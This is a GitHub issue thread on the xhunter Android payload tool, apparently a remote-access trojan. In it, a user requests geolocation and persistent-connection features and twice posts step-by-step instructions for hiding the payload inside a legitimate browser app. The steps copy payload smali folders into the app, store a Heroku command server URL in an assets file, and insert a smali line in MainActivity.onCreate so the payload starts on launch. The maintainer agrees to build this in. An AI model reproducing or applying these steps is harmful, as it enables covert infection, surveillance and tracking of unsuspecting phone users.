### ISSUE TITLE
Feature request 

### ISSUE THREAD

**Issue by Ruben978** [anirudhmalik/xhunter#30]
1. Most of the time bind don't work it can't find MainActivity.smali but when I tried to bind manually it works maybe you should prompt user to provide mainactivity path?

2. Geo location
3. Notification for persistent connection

**Comment by EJ3CT** [comment]
> 1. Most of the time bind don't work it can't find MainActivity.smali but when I tried to bind manually it works maybe you should prompt user to provide mainactivity path?
> 
> 2. Geo location
> 3. Notification for persistent connection
>  

can you kindly tell me how to bind manually

**Comment by Ruben978** [comment]
> 

I'll use the dolphin browser as an example.

1. Copy the payload folder's xhunter, io, okhttp3, and okio files to dolphin src/smali/com/
2. copy okhttp3 from payload/unknown/ to dolphin/unknown/ create folder if not exist
3. Create a text file called "ip.txt" in dolphin src/assets and paste your heroku url, which is something like "name.herokuapp.com."
4. go to original app Mainactivity.smail search onCreate and paste this invoke-static {p0}, Lcom/xhunter/client/Payload;->start(Landroid/content/Context;)V    below invoke-super

and for permission idk storage permission was already there in dolphin browser

**Comment by Ruben978** [comment]
> > 1. Most of the time bind don't work it can't find MainActivity.smali but when I tried to bind manually it works maybe you should prompt user to provide mainactivity path?
> > 2. Geo location
> > 3. Notification for persistent connection
> 
> can you kindly tell me how to bind manually

I'll use the dolphin browser as an example.

1. Copy the payload folder's xhunter, io, okhttp3, and okio files to dolphin src/smali/com/
2. copy okhttp3 from payload/unknown/ to dolphin/unknown/ create folder if not exist
3. Create a text file called "ip.txt" in dolphin src/assets and paste your heroku url, which is something like "name.herokuapp.com."
4. go to original app Mainactivity.smail search onCreate and paste this invoke-static {p0}, Lcom/xhunter/client/Payload;->start(Landroid/content/Context;)V    below invoke-super

and for permission idk storage permission was already there in dolphin browser

**Comment by anirudhmalik** [comment]
@Ruben978 thanks for your suggestion,  I will patch it soon.
